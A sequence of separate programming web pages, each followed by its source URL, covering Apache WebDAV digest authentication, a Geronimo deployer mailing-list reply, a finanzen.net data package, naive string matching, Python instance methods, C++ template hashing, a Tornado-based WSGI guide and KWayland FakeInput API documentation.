    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
    Alias /webdav /var/www/webdav
    <Directory /var/www/webdav>
        DAV On
        AuthType Digest
        AuthName "webdav"
        AuthUserFile /etc/apache2/users.password
        Require valid-user
    </Directory>
</VirtualHost>

The mod_authn module contains the definitions for the authentication directives.
The AuthType directive instructs Apache that for the /var/www/webdav directory there should be authentication using the Digest scheme. Digest authentication requires a value for realm, which we set as webdav. Realm acts like a namespace: when you have users with the same name, you can separate them using different values for realm. We use the AuthName directive to set the value for realm. The AuthUserFile directive is used to indicate the location of the password file. The Require directive states that only valid users who authenticate themselves are able to access that directory.

Finally, enable the Digest module and restart the server for the settings to take effect.

sudo a2enmod auth_digest
sudo service apache2 restart

Step Four — Accessing the Files

We'll demonstrate how to access your WebDAV server from the native file browsers of Mac, Windows, and Linux (Ubuntu). We are going to demonstrate file and folder operations on just the Mac for the sake of brevity, although you can add, edit, and delete files on the server from all operating systems. You can also access the files over the Internet using a web browser. You may need to eject the drive and reconnect to it if you tested it earlier, before we added authentication.

Mac

On a Mac, open Finder. On the menu bar, find Go and select the option Connect to Server. Enter the server address. It should be http://<your.server>/webdav. Press Connect. You will be prompted for a username and password.
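For reference, each line htdigest writes to users.password has the form user:realm:HA1, where HA1 is the MD5 of "user:realm:password". A small sketch of that computation (the sample password is made up):

```python
import hashlib

def htdigest_entry(user, realm, password):
    """Build a users.password line the way htdigest does."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    return f"{user}:{realm}:{ha1}"

entry = htdigest_entry("alex", "webdav", "s3cret")
```

This is why the realm given to AuthName must match the one given to htdigest: the stored hash binds user name, realm, and password together, so a realm mismatch makes every login fail.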
https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-14-04
On 6/10/06, Stefan Arentz <stefan.arentz@gmail.com> wrote:
> First question: What is it that connects a Quartz Job Deployment Plan
> to the Quartz Job Deployer? Is it simply the xml schema namespace
> defined in geronimo-quartz-0.1.xsd?

Right -- the schema, and the fact that the plan was in the right place for us to find it to begin with. For all the deployers we've done so far, we use XMLBeans to create JavaBeans connected to the schema. Then we use XMLBeans to read in the deployment plan, and check whether it's the type this deployer expects. For example:

XmlObject xmlObject;
if (planFile != null) {
    xmlObject = XmlBeansUtil.parse(planFile.toURL());
} else {
    URL path = DeploymentUtil.createJarURL(jarFile, "META-INF/geronimo-quartz.xml");
    try {
        xmlObject = XmlBeansUtil.parse(path);
    } catch (FileNotFoundException e) {
        // It has a JAR but no plan, and nothing at META-INF/geronimo-quartz.xml,
        // therefore it's not a quartz job deployment
        return null;
    }
}
if (xmlObject == null) {
    return null;
}

This part establishes that we can load a plan at all. If not, it either means no plan was provided, or the plan is in the module at a different location (e.g. WEB-INF/geronimo-web.xml). Either way, this deployer can't handle the archive, so we return null. If we get past that, it means that we found a plan. So we go on to check the type:

XmlCursor cursor = xmlObject.newCursor();
try {
    cursor.toFirstChild();
    if (!SERVICE_QNAME.equals(cursor.getName())) {
        return null;
    }
} finally {
    cursor.dispose();
}

The (badly named) constant SERVICE. So far so good?

Thanks,

Aaron
http://mail-archives.apache.org/mod_mbox/geronimo-user/200606.mbox/%3C74e15baa0606101559x1d8b261awcf517c8ea6b5729d@mail.gmail.com%3E
API to fetch stock data fundamentals from finanzen.net

Project description

Finanzen-Fundamentals is a Python package that can be used to retrieve fundamentals of stocks. The data is fetched from finanzen.net, a German-language financial news site. Note that the API is in English, but all data will be returned in German.

Installation

The package will be hosted on PyPI very soon, so that you can install it via pip. If you choose to download the source code, make sure that you have the following dependencies installed:

- requests
- BeautifulSoup

You can install both of them by running: pip install requests BeautifulSoup

Usage

Import

After you successfully installed the package, you can include it in your projects by importing it.

import finanzen_fundamentals

Retrieve Fundamentals

You can retrieve the fundamentals of a single stock by running:

bmw_fundamentals = get_fundamentals("bmw")

This will fetch the fundamentals of BMW and save them into a dictionary called bmw_fundamentals. bmw_fundamentals will have the following keys:

- Quotes
- Key Ratios
- Income Statement
- Balance Sheet
- Other

The values for those keys will be variables holding a year:value dictionary. If no data can be found, the value will be None.

You can also fetch estimates for expected values by using:

bmw_estimates = stocks.get_estimates("bmw")

This will save estimates for the most important key metrics if available. The resulting dictionary will hold variable names as keys and a year:value dictionary as values.

Note that we use stock names, not stock symbols, when fetching data. You can search for stock names by using:

stocks.search_stock("bmw", limit = 3)

This will print the three best-matching stock names for your search. You can increase the limit to 30. If you don't give a parameter, all available data will be printed (up to 30).
https://pypi.org/project/finanzen-fundamentals/
t = 'haystack needle haystack' # "text" - thing we search in p = 'needle' # "pattern" - thing we search for def naive(p, t): assert len(p) <= len(t) # assume text at least as long as pattern occurrences = [] for i in range(len(t)-len(p)+1): # for each alignment of p to t match = True # assume we match until proven wrong for j in range(len(p)): # for each position of p if t[i+j] != p[j]: match = False # at least 1 char mismatches break if match: occurrences.append(i) return occurrences naive(p, t) [9] t[9:9+len(p)] # confirm it really occurs 'needle' naive('needle', 'needleneedleneedle') [0, 6, 12]
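A compact variant of the same naive matcher (my rewrite, not part of the notebook) replaces the inner character loop with a slice comparison; it reports the same occurrences:

```python
def naive_slice(p, t):
    # same O(len(t) * len(p)) idea, but compare whole slices at once
    return [i for i in range(len(t) - len(p) + 1) if t[i:i+len(p)] == p]

print(naive_slice('needle', 'haystack needle haystack'))   # [9]
print(naive_slice('needle', 'needleneedleneedle'))         # [0, 6, 12]
```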
http://nbviewer.jupyter.org/github/BenLangmead/comp-genomics-class/blob/master/notebooks/CG_Naive.ipynb
In Python object-oriented programming, when we design a class, we use instance methods and class methods.

Inside a class, we can define the following two types of methods.

- Instance methods: Used to access or modify the object state. If we use instance variables inside a method, such methods are called instance methods. An instance method must have a self parameter to refer to the current object.
- Class methods: Used to access or modify the class state. If a method uses only class variables, we should declare it as a class method. A class method has a cls parameter which refers to the class.

Also, read Python Class method vs Static method vs Instance method.

After reading this article, you'll learn:

- How to create and call instance methods
- How to dynamically add or delete instance methods in Python

Table of contents

What are Instance Methods in Python

If we use instance variables inside a method, such methods are called instance methods. An instance method performs a set of actions on the data/value provided by the instance variables.

- An instance method is bound to an object of the class.
- It can access or modify the object state by changing the value of its instance variables.

When we create a class in Python, instance methods are used regularly. To work with an instance method, we use the self keyword as the first parameter of the method. The self refers to the current object. Any method we create in a class will automatically be created as an instance method unless we explicitly tell Python that it is a class or static method.

Define Instance Method

Instance variables are not shared between objects. Instead, every object has its own copy of the instance attribute. Using an instance method, we can access or modify the calling object's attributes.

Instance methods are defined inside a class, and defining one is pretty similar to defining a regular function.

- Use the def keyword to define an instance method in Python.
- Use self as the first parameter in the instance method when defining it. The self parameter refers to the current object.
- Use the self parameter to access or modify the current object's attributes.

You may use a variable named differently from self, but it is discouraged since self is the recommended convention in Python.

Let's see an example that creates an instance method show() in the Student class to display the student details.

Example:

class Student:
    # constructor
    def __init__(self, name, age):
        # Instance variable
        self.name = name
        self.age = age

    # instance method to access instance variable
    def show(self):
        print('Name:', self.name, 'Age:', self.age)

Calling An Instance Method

We use an object and the dot (.) operator to execute the block of code or action defined in the instance method.

- First, create instance variables name and age in the Student class.
- Next, create an instance method show() to print the student's name and age.
- Next, create an object of the Student class to call the instance method.

Let's see how to call the instance method show() to access the student object's details such as name and age.

class Student:
    # constructor
    def __init__(self, name, age):
        # Instance variable
        self.name = name
        self.age = age

    # instance method access instance variable
    def show(self):
        print('Name:', self.name, 'Age:', self.age)

# create first object
print('First Student')
emma = Student("Jessa", 14)
# call instance method
emma.show()

# create second object
print('Second Student')
kelly = Student("Kelly", 16)
# call instance method
kelly.show()

Output:

First Student
Name: Jessa Age: 14
Second Student
Name: Kelly Age: 16

Note: Inside any instance method, we can use self to access any data or method that resides in our class. We are unable to access it without a self parameter. An instance method can freely access attributes and even modify the value of attributes of an object by using the self parameter.
By using the self.__class__ attribute, we can access the class attributes and change the class state. Therefore, instance methods give us control over changing the object state as well as the class state.

Modify Instance Variables inside Instance Method

Let's create an instance method update() to modify the student's age and roll number when the student's details change.

class Student:
    def __init__(self, roll_no, name, age):
        # Instance variable
        self.roll_no = roll_no
        self.name = name
        self.age = age

    # instance method access instance variable
    def show(self):
        print('Roll Number:', self.roll_no, 'Name:', self.name, 'Age:', self.age)

    # instance method to modify instance variable
    def update(self, roll_number, age):
        self.roll_no = roll_number
        self.age = age

# create object
print('class VIII')
stud = Student(20, "Emma", 14)
# call instance method
stud.show()

# Modify instance variables
print('class IX')
stud.update(35, 15)
stud.show()

Output:

class VIII
Roll Number: 20 Name: Emma Age: 14
class IX
Roll Number: 35 Name: Emma Age: 15

Create Instance Variables in Instance Method

So far, we have used the constructor to create instance attributes. But instance attributes are not specific only to the __init__() method; they can be defined elsewhere in the class. So, let's see how to create an instance variable inside a method.

Example:

class Student:
    def __init__(self, roll_no, name, age):
        # Instance variable
        self.roll_no = roll_no
        self.name = name
        self.age = age

    # instance method to add instance variable
    def add_marks(self, marks):
        # add new attribute to current object
        self.marks = marks

# create object
stud = Student(20, "Emma", 14)

# call instance method
stud.add_marks(75)

# display object
print('Roll Number:', stud.roll_no, 'Name:', stud.name, 'Age:', stud.age, 'Marks:', stud.marks)

Output:

Roll Number: 20 Name: Emma Age: 14 Marks: 75

Dynamically Add Instance Method to an Object

Usually, we add methods to a class body when defining a class.
However, Python is a dynamic language that allows us to add or delete instance methods at runtime. This is helpful in the following scenarios.

- When the class is in a different file and you don't have access to modify the class structure
- When you want to extend the class functionality without changing its basic structure, because many systems use the same structure

Let's see how to add an instance method to the Student class at runtime.

Example:

We should add the method to the object, so that other instances don't have access to that method. We use the types module's MethodType() to add a method to an object. Below is the simplest way to add a method to an object.

import types

class Student:
    # constructor
    def __init__(self, name, age):
        self.name = name
        self.age = age

    # instance method
    def show(self):
        print('Name:', self.name, 'Age:', self.age)

# create new method
def welcome(self):
    print("Hello", self.name, "Welcome to Class IX")

# create object
s1 = Student("Jessa", 15)

# Add instance method to object
s1.welcome = types.MethodType(welcome, s1)
s1.show()
# call newly added method
s1.welcome()

Output:

Name: Jessa Age: 15
Hello Jessa Welcome to Class IX

Dynamically Delete Instance Methods

We can dynamically delete an instance method from a class. In Python, there are two ways to delete a method:

- By using the del operator
- By using the delattr() function

By using the del operator

The del operator removes a method or attribute from an object or a class.

Example: In this example, we try to delete the instance method named percentage() from the emma object. Because percentage() is defined on the class rather than stored on the object itself, del emma.percentage itself raises an AttributeError, as the output below shows; deleting the method for every object requires del Student.percentage instead.
class Student:
    # constructor
    def __init__(self, name, age):
        self.name = name
        self.age = age

    # instance method
    def show(self):
        print('Name:', self.name, 'Age:', self.age)

    # instance method
    def percentage(self, sub1, sub2):
        print('Percentage:', (sub1 + sub2) / 2)

emma = Student('Emma', 14)
emma.show()
emma.percentage(67, 62)

# Delete the method using the del operator
del emma.percentage

# Again calling percentage() method
# It will raise an error
emma.percentage(67, 62)

Output:

Name: Emma Age: 14
Percentage: 64.5
File "/demos/oop/delete_method.py", line 21, in <module>
    del emma.percentage
AttributeError: percentage

By using the delattr() function

The delattr() function is used to delete the named attribute from an object. Use the following syntax to delete an instance method.

delattr(object, name)

object: the object whose attribute we want to delete.
name: the name of the instance method you want to delete from the object.

Example: In this example, we delete the instance method named percentage() using delattr(). Like del, this raises an AttributeError when the attribute lives on the class rather than on the object.

emma = Student('Emma', 14)
emma.show()
emma.percentage(67, 62)

# delete instance method percentage() using delattr()
delattr(emma, 'percentage')
emma.show()

# Again calling percentage() method
# It will raise an error
emma.percentage(67, 62)
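One detail mentioned earlier deserves a concrete example: inside an instance method, self.__class__ reaches the class itself, so an instance method can change class state as well as object state. A small self-contained sketch (the class variable and method names here are invented for illustration):

```python
class Student:
    school = "ABC School"  # class variable, shared by every instance

    def __init__(self, name):
        self.name = name   # instance variable, per object

    def change_school(self, new_name):
        # self.__class__ is the class of the current object, so this
        # assignment modifies class state, not just this one instance
        self.__class__.school = new_name

s1 = Student("Jessa")
s2 = Student("Kelly")
s1.change_school("XYZ School")
print(s2.school)  # XYZ School -- the change is visible through every instance
```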
https://pynative.com/python-instance-methods/
how can I convert a variable of type template to an integer??

You can't. Templates take on a data type when they are declared. For example, vector<int> list; is a vector of integers. Once declared it can not be changed to a vector of strings or something else.

vector<int> list;

But then again, maybe I misunderstood the question. Post an example of what you want to do.

All I want is to convert the elem to an ASCII code, and elem may be of any data type:

template<typename T>
int h(T elem, int size){
    int i;
    int n = (int)elem;
    i = n % size;
    return i;
}

That makes no sense. If T is type double how is the function supposed to convert the double to a single ascii character???

Um, presumably by taking the modulo of the integer part against parameter size, which would presumably be 256 in this case? ;)

Not saying it makes much sense, still, but it should "work".... And to the OP, you already have code, what seems to be the problem?

>> which would presumably be 256 in this case?

why 256? sizeof(double) != 256, so where did you get that number?

@OP you want this I think:

#include <sstream>
using namespace std;

template<typename R, typename T>
R cast(const T& input){
    stringstream stream;
    stream << input;
    R ret = R();
    stream >> ret;
    return ret;
}

int main(){
    int i = cast<int>("12345");
    float pi = cast<float>("3.1415"); // note: cast<float>, not cast<int>
}

It has nothing to do with the magnitude of the double, or the memory allocated to store it. I'm assuming the OP is taking the modulo of (int)(original_value) % size to limit the range of output values. 256 would be the max-value-plus-one of an 8-bit ASCII value the OP was hoping to convert to.... Or he could use 128 instead to get a 7-bit ASCII result. For what it's worth.... Minimally related, the integer portions of large float/double values can't be represented by the int type.
My test here returns INT_MIN (from limits.h) for:

float f = 3e12;
int i = int(f);

Thanks all, but I still have the same problem. I'm implementing a hash table now, and I asked this question to get the hash function for each element in a file. To get the hash function, I must get a specific number for each element and then divide it by n. So how can I get this number? Any help will be appreciated.

Now that we know what you're actually trying to accomplish, let me google that for you:

Here's an example of how you can split the key in bytes and then use them to calculate the hash value, provided that the key is a primitive or a POD:

#include <iostream>
#include <cstdint>

template <class T>
uint32_t hash(const T & key, uint32_t key_size, uint32_t table_size)
{
    const uint8_t * bytes = reinterpret_cast<const uint8_t *>(&key);
    uint32_t hash_value = 0;
    for (uint32_t i = 0; i < key_size; i++)
    {
        hash_value += bytes[i] << (i % 16);
        hash_value += bytes[i] << ((key_size - i) % 16);
    }
    return hash_value % table_size;
}

int main()
{
    const uint32_t table_size = 19;
    std::cout << hash("hello, world!", 13 * sizeof(char), table_size) << std::endl;
    std::cout << hash("hello, again!", 13 * sizeof(char), table_size) << std::endl;
    std::cout << hash(23, sizeof(int), table_size) << std::endl;
    std::cout << hash(44, sizeof(int), table_size) << std::endl;
    std::cout << hash(67, sizeof(int), table_size) << std::endl;
    std::cout << hash(5.5, sizeof(double), table_size) << std::endl;
    std::cout << hash(2.7, sizeof(double), table_size) << std::endl;
    std::cout << hash(3.4, sizeof(double), table_size) << std::endl;
    return 0;
}

A somewhat better hash function:

//...
for (uint32_t i = 0; i < key_size; i++)
{
    hash_value += bytes[i] << ( 23 * i % 24 );
    hash_value += bytes[i] << ( 23 * (key_size - i) % 24 );
}
//...

What's this thing with the 30 minute limit to editing?... -.- ...
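For comparison, the same byte-folding idea can be sketched in Python (the function names below are my own, and struct is used in place of reinterpret_cast to get at the key's bytes):

```python
import struct

def hash_bytes(data: bytes, table_size: int) -> int:
    # fold each byte in with a position-dependent shift,
    # then reduce modulo the table size
    h = 0
    for i, b in enumerate(data):
        h += b << (i % 16)
    return h % table_size

def hash_key(key, table_size: int) -> int:
    # serialize common key types to bytes first
    if isinstance(key, int):
        data = struct.pack("q", key)      # 8-byte signed int
    elif isinstance(key, float):
        data = struct.pack("d", key)      # 8-byte IEEE double
    else:
        data = str(key).encode()
    return hash_bytes(data, table_size)

print(hash_key("hello, world!", 19))
print(hash_key(23, 19))
print(hash_key(5.5, 19))
```

The result is always in range(table_size), so it can be used directly as a bucket index.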
https://www.daniweb.com/programming/software-development/threads/367883/convert-template-to-int
The Definitive Guide to WSGI

Python has a number of different frameworks for building web applications. The choice of framework limits the choice of available web servers. Java also has a number of web frameworks, but they are all based on the common servlet API, which means that any framework can run on any web server that supports the servlet API.

You've probably seen WSGI mentioned before, but you might not be exactly sure what it meant or did. In this post, you will learn to write your own WSGI application and a basic WSGI server, too! Let's get started!

(The dry technical details of WSGI are defined in PEP 333 and extended with PEP 3333 to improve string handling in Python 3.)

PS: The code for this project can be found on GitHub if you'd like to check it out

Prerequisites to Building a WSGI Application

First things first, if you don't already have Python installed on your computer, you will need to install a recent version of Python 3. Next, you need to install the Tornado library (which will be used to run the WSGI application):

pip install tornado

Finally, create a project directory where all of our future code will live:

mkdir ~/wsgi
cd ~/wsgi

How to Build a Simple WSGI Application

We will start by creating the simplest WSGI application running in a Tornado server. Create a file called simple.py containing the following Python code:

from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.wsgi import WSGIContainer

def application(environ, start_response):
    status = '200 OK'
    response_headers = [('Content-type', 'text/plain')]
    start_response(status, response_headers)
    return [b"Welcome to WSGI!\n"]

container = WSGIContainer(application)
server = HTTPServer(container)
server.listen(8080)
print("Listening")
IOLoop.current().start()

Let's explain what this code does. It is necessary to import any external packages so that Python can find the code.
We could have simply used import tornado.ioloop, but then later we would have had to write tornado.ioloop.IOLoop in the code. Using the from form of import means that we can just use IOLoop.

The function application implements WSGI. PEP 3333 refers to it as the application object. It has two parameters that are required by the WSGI server interface. These parameters are passed by the WSGI server implementation—in this case, the WSGIContainer.

The first parameter, environ, is a dictionary of environment variables. It must include the environment variables defined by the Common Gateway Interface (CGI) specification, it may contain environment variables from the operating system, and it must also contain WSGI-defined variables. These environment variables are listed in the PEP 3333 document.

The second parameter, start_response, is a function that must be called by the application function on each request. start_response takes two parameters: the response status code and a list of response headers. Each list element represents a header and is a tuple containing the header name and the header value. In the example above, the list contains one element that represents the Content-Type header:

[('Content-type', 'text/plain')]

The application object needs to define the HTTP response. It defines the status code, which is a string containing a three-digit number and a message. It also needs to define any response headers in the form of a list of tuples. It then calls the start_response function, passing it the status and headers, and returns the response body. The body must be of the Python type bytes, hence the b in front of the string.

Finally, we need to create a server: a Tornado WSGIContainer object, which takes the WSGI function as a parameter. We then construct the HTTPServer object, passing it the WSGI container. We then need to tell the server which port to listen on, in this case, port 8080.
The last line starts an IOLoop, which will start listening on port 8080 and pass requests to the application. The server can now be run using:

python simple.py

The server can be tested by pointing a web browser at http://localhost:8080 or by using the curl command:

curl http://localhost:8080

The welcome message should be displayed. The server can be stopped by typing Control-C. Python will complain about being interrupted, but this can be ignored.

How to Create a Python Package Containing a WSGI Application

A Python package is simply a directory containing Python files. We are going to create a package called server, which needs to be in a directory of the same name.

mkdir server

The Python package plumbing requires a file called __init__.py which is executed whenever the package is imported. It can be an empty file.

touch server/__init__.py

A WSGI application can also be implemented as a class. Create the file server/Application.py containing the following Python code:

class Application:
    def __init__(self, environ, start_response):
        self.environ = environ
        self.start = start_response

    def __iter__(self):
        status = "200 OK"
        headers = [("Content-type", "text/plain")]
        self.start(status, headers)
        for chunk in [b"Welcome", b" ", b"to", b" ", b"WSGI!\n"]:
            yield chunk

Like the application function we wrote above, the constructor __init__ must have the two parameters that are required by the WSGI server interface. In our example, these are saved as instance attributes. The class also needs to have an iterator method called __iter__, which at some point must call the start_response function that was passed to the constructor. The __iter__ method must also yield responses—as the "bytes" type and not the "str" type you might expect. Note that __iter__ is a generator. This is why the keyword yield is used in place of return. Tersely put, __iter__ is a generator that yields bytes. The generator is used because the response body could be a large object such as a video.
This allows the server to start sending content immediately, instead of waiting until everything is loaded.

If a package contains a file called __main__.py, it becomes the entry point for the module and allows the package to be run without specifying any Python files. Create a file called server/__main__.py with the following content:

from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.options import define, options
from tornado.wsgi import WSGIContainer
from .Application import Application

define("port", default=8080, help="Listener port")
options.parse_command_line()

container = WSGIContainer(Application)
server = HTTPServer(container)
server.listen(options.port)
print("Listening on port", options.port)
IOLoop.current().start()

This is similar to the earlier code, except that the class is passed to the WSGI container in place of the function.

It is bad practice to hard code the port number. Tornado provides an options package that allows command-line options to be defined and processed. A port option is defined which has a default value of 8080. It can be changed to port 80 on the command line using the --port=80 option. The server can be run specifying the port number to use.

python -m server --port=8080

The program can be tested using curl; the -i option prints out the response headers.

curl -i http://localhost:8080

Understanding the WSGI Environment

The WSGI environment dictionary contains the information required to process requests.
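As a quick illustration of what a handler typically pulls out of this dictionary, here is a small helper of my own (the sample environ uses only keys PEP 3333 defines):

```python
from urllib.parse import parse_qs

def describe_request(environ):
    # method and path come straight from CGI-style variables
    method = environ["REQUEST_METHOD"]
    path = environ.get("PATH_INFO", "/")
    # QUERY_STRING holds the raw query; parse_qs maps names to value lists
    params = parse_qs(environ.get("QUERY_STRING", ""))
    return method, path, params

env = {"REQUEST_METHOD": "GET", "PATH_INFO": "/example",
       "QUERY_STRING": "user=Joe"}
print(describe_request(env))  # ('GET', '/example', {'user': ['Joe']})
```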
We will copy server/Application.py to server/Environment.py while also renaming the "Application" class to "Environment":

cat server/Application.py | sed 's/Application/Environment/' > server/Environment.py

Next, we will modify the iterator method in server/Environment.py to return the contents of the dictionary:

def __iter__(self):
    status = "200 OK"
    headers = [("Content-type", "text/plain")]
    self.start(status, headers)
    for key, value in sorted(self.environ.items()):
        yield f"{key}: {value}\n".encode()

We also need to change Application to Environment in server/__main__.py so that it looks like this:

from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.options import define, options
from tornado.wsgi import WSGIContainer
from .Environment import Environment

define("port", default=8080, help="Listener port")
options.parse_command_line()

container = WSGIContainer(Environment)
server = HTTPServer(container)
server.listen(options.port)
print("Listening on port", options.port)
IOLoop.current().start()

Run the server and then use curl to send a GET request.

curl "http://localhost:8080/example?user=Joe"

The contents of the dictionary are:

HTTP_ACCEPT: */*
HTTP_HOST: localhost:8080
HTTP_USER_AGENT: curl/7.64.1
PATH_INFO: /example
QUERY_STRING: user=Joe
REMOTE_ADDR: ::1
REQUEST_METHOD: GET
SCRIPT_NAME:
SERVER_NAME: localhost
SERVER_PORT: 8080
SERVER_PROTOCOL: HTTP/1.1
wsgi.errors: <_io.TextIOWrapper
wsgi.input: <_io.BytesIO object at 0x1077d36d0>
wsgi.multiprocess: True
wsgi.multithread: False
wsgi.run_once: False
wsgi.url_scheme: http
wsgi.version: (1, 0)

The request method is in the environment variable REQUEST_METHOD. You can find the components of the URL in the environment variables wsgi.url_scheme, HTTP_HOST, PATH_INFO, and QUERY_STRING. Now use curl to send a POST request.
curl -i -X POST -d "email=michelle@example.com&password=abcd1234" http://localhost:8080/login

The contents of the dictionary are:

CONTENT_LENGTH: 44
CONTENT_TYPE: application/x-www-form-urlencoded
HTTP_ACCEPT: */*
HTTP_HOST: localhost:8080
HTTP_USER_AGENT: curl/7.64.1
PATH_INFO: /login
QUERY_STRING:
REMOTE_ADDR: ::1
REQUEST_METHOD: POST
SCRIPT_NAME:
SERVER_NAME: localhost
SERVER_PORT: 8080
SERVER_PROTOCOL: HTTP/1.1
wsgi.errors: <_io.TextIOWrapper
wsgi.input: <_io.BytesIO object at 0x1042f5450>
wsgi.multiprocess: True
wsgi.multithread: False
wsgi.run_once: False
wsgi.url_scheme: http
wsgi.version: (1, 0)

The POST request sent parameters in the HTTP request body. This added the environment variables CONTENT_LENGTH and CONTENT_TYPE. The request body is contained in the environment variable wsgi.input, which is a byte stream. This can be displayed by decoding the byte stream.

def __iter__(self):
    status = "200 OK"
    headers = [("Content-type", "text/plain")]
    self.start(status, headers)
    for key, value in sorted(self.environ.items()):
        yield f"{key}: {value}\n".encode()
    yield self.environ['wsgi.input'].getvalue()
    yield "\n".encode()

The output from the curl request now has the following line:

email=michelle@example.com&password=abcd1234

What are WSGI Server Considerations?

The Tornado WSGI container runs a single application. It also requires Python code to create the container and the server. A consequence of this is that the application needs to use the request method and the path to decide what content to serve.

There is another popular Python webserver called Green Unicorn. It can run Python web applications, including WSGI applications, without any additional code. If the WSGI application is not a function called application, then the function or class needs to be specified on the command line after a colon character. Again, it runs a single application.

pip install gunicorn
gunicorn -b :8080 server.Application:Application

A more flexible solution is to use an Apache web server which has the mod_wsgi module installed.
This allows URIs to be mapped to WSGI applications. A single server can run multiple applications, each one handling a different URI.

How to Implement a WSGI Server

It may sometimes be necessary to implement the WSGI server side of the interface. A typical use case is writing a middleware layer that needs to perform transformation or forward requests to other servers. In this example, we will implement a server that can redirect requests to different WSGI applications based on the HTTP request method and the URI. Create a file called server/WSGIRunner.py containing the following Python code:

import sys
from tornado.web import RequestHandler
from .Application import Application
from .Environment import Environment

class WSGIRunner(RequestHandler):
    headers = []
    url_map = {
        '/': Application,
        '/env': Environment
    }

    def get(self, path):
        self._set_environment('GET', path)
        if path in WSGIRunner.url_map:
            self.run(WSGIRunner.url_map[path])
        else:
            self.send_error(404)

    def _set_environment(self, method, path):
        self.environ = {
            'wsgi.errors': sys.stderr,
            'wsgi.input': sys.stdin.buffer,
            'wsgi.multiprocess': True,
            'wsgi.multithread': False,
            'wsgi.run_once': False,
            'wsgi.url_scheme': 'http',
            'wsgi.version': (1, 0),
            'HTTP_ACCEPT': self.request.headers['Accept'],
            'HTTP_HOST': self.request.headers['Host'],
            'HTTP_USER_AGENT': self.request.headers['User-Agent'],
            'REQUEST_METHOD': method,
            'PATH_INFO': path
        }
        query = ''
        for k, v in self.request.arguments.items():
            if len(query) > 0:
                query += '&'
            query += k + '=' + v[0].decode()
        self.environ['QUERY_STRING'] = query

    @staticmethod
    def start_response(status, response_headers):
        WSGIRunner.headers = response_headers

    def run(self, application):
        result = application(self.environ, WSGIRunner.start_response)
        for header in WSGIRunner.headers:
            self.set_header(header[0], header[1])
        for data in result:
            self.write(data)

The class WSGIRunner is a Tornado request handler which implements a get method that has a path parameter containing the request URI.
The _set_environment() method is called to create the environment map required by WSGI. Its parameters are the request method—in this case, GET—and the path. The get method looks up the path in a static dictionary. If the entry exists, the dictionary returns the class containing the WSGI application to run. The run method is called to run the application. If the path is not in the map, a 404 not found response is sent using the RequestHandler send_error() method.

The start_response() method is the response callback required by the WSGI interface. It has to be a static method. The @staticmethod annotation allows the class to define a static method that does not require a self parameter. The method simply stores the response headers in the static list headers.

The run method calls the WSGI application, passing the environment dictionary and the response callback. It then sets the response headers and writes the data returned by the application as the response. Tornado will decode any query string, so it needs to be reconstructed from the request arguments.

The file __main__.py now must be changed to run the WSGIRunner as a Tornado application.

from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.options import define, options
from tornado.web import Application
from .WSGIRunner import WSGIRunner

define("port", default=8080, help="Listener port")
options.parse_command_line()

application = Application([("(/.*)", WSGIRunner)])
server = HTTPServer(application)
server.listen(options.port)
print("Listening on port", options.port)
IOLoop.current().start()

The Tornado Application gets passed an array of tuples, in this case just one. The tuple contains a URI and a class that handles it. In this case, the URI is a regular expression in parentheses that matches everything. The parentheses cause the URI to be captured and passed as a parameter to the get method.

Summing Up WSGI

WSGI is an interface specification for Python web applications.
It is a low-level interface. Many Python developers build web applications using popular frameworks, such as Flask, Tornado, or Django. If it is unlikely that the web application framework will be changed, the benefits of using the framework APIs outweigh the limitations of WSGI. If, however, the web application is designed to be deployed in different server environments, then WSGI is the only choice, as it is a Python standard.

The biggest limitation of WSGI is that the application needs to implement code conditionally based on the request method and the request URI. It also needs to extract and decode any request parameters from the environment dictionary. These limitations can be overcome by using a standalone server implementation, which can invoke different WSGI applications depending on the request method and URI. A utility class can decode request parameters and return a dictionary in a more consumable form.

To sum it up, while WSGI is a low-level protocol for building web applications in Python, it is often helpful to understand how these things work behind the scenes. While you probably won't be building any raw WSGI applications, I hope this information will be helpful to you in your web development journey.

If you liked this post, be sure to check out some of our other great posts:

- Build a Simple CRUD App with Python, Flask, and React
- An Illustrated Guide to OAuth and OpenID Connect
- What the Heck is OAuth?

We are always posting new content. If you liked this post, be sure to follow us on Twitter, subscribe to our YouTube channel, and follow us on Twitch.
https://developer.okta.com/blog/2020/11/16/definitive-guide-to-wsgi
KWayland::Client::FakeInput #include <fakeinput.h>

Detailed Description

Wrapper for the org_kde_kwin_fake_input interface.

FakeInput allows faking input events into the Wayland server. This is a privileged Wayland interface and the Wayland server is allowed to ignore all events.

This class provides a convenient wrapper for the org_kde_kwin_fake_input interface. To use this class one needs to interact with the Registry. There are two possible ways to create the FakeInput interface: This creates the FakeInput and sets it up directly. As an alternative this can also be done in a more low level way: The FakeInput can be used as a drop-in replacement for any org_kde_kwin_fake_input pointer as it provides matching cast operators.

Definition at line 50 of file fakeinput.h.

Constructor & Destructor Documentation

Note: after constructing the FakeInput it is not yet valid and one needs to call setup. In order to get a ready-to-use FakeInput prefer using Registry::createFakeInput.

Definition at line 34 of file fakeinput.cpp.

Member Function Documentation

Authenticate with the Wayland server in order to request sending fake input events. The Wayland server might ignore all requests without a prior authentication. The Wayland server might use the provided applicationName and reason to ask the user whether this request should get authenticated. There is no way for the client to figure out whether the authentication was granted or denied. The client should assume that it wasn't granted.

- Parameters -

Definition at line 77 of file fakeinput.cpp.

Destroys the data held by this FakeInput. This method cleans up the data so that the instance can be set up with a new org_kde_kwin_fake_input interface once there is a new connection available. This method is automatically invoked when the Registry which created this FakeInput gets destroyed.

Definition at line 50 of file fakeinput.cpp.

- Returns - The event queue to use for bound proxies.

Definition at line 67 of file fakeinput.cpp.

- Returns - true if managing a org_kde_kwin_fake_input.
Definition at line 55 of file fakeinput.cpp.

Releases the org_kde_kwin_fake_input interface. After the interface has been released the FakeInput instance is no longer valid and can be setup with another org_kde_kwin_fake_input interface.

Definition at line 45 of file fakeinput.cpp.

The corresponding global for this interface on the Registry got removed. This signal only gets emitted if the FakeInput got created by Registry::createFakeInput

- Since - 5.5

Request a keyboard key press.

- Parameters -
- Since - 5.63

